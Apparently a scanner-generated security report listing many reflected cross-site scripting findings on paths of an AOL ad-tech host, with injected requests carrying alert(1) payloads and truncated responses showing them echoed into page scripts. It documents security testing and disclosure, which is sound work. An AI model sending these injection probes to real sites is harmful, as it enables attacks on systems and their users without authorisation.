HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... =s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules5557a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/node/node.css |
GET /modules/node975cb"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:23 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... ('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/node/node.css |
GET /modules/nodedea4b"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/defaults |
GET /modules8dd5c"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:26 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13528 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/defaults |
GET /modulesfe51e"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:32 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13458 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... =s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modulesfe51e"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/defaults |
GET /modules/system97cc9"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:39 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:39 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13458 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/defaults |
GET /modules/system95224"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:31 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:32 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13528 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modules2796e"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:01 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13544 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modulesd399c"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:04 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... =s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modulesd399c"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modules/systembec01"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:45 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13544 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modules/systemdafeb"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:51 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modulesce561"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13450 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... =s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modulesce561"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modules9d8cc"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:08 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13520 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modules/systemb6e5e"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:08 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:09 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13450 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/system/system |
GET /modules/system6ad68"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:00 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13520 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/user/user.css |
GET /modules15e38"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:16 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/user/user.css |
GET /modules9d372"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:37:21 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:37:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... =s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules9d372"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/user/user.css |
GET /modules/user2433c"><script>alert(1)< Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /modules/user/user.css |
GET /modules/user5d4bb"-alert(1)- Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:38:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:38:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... ('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/modules s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /naiaba41"><script>alert(1)< Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:09 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:09 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13792 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://nai.glb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai55e12"-alert(1)- Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=NOID; OptOut=we will not set any more cookies |
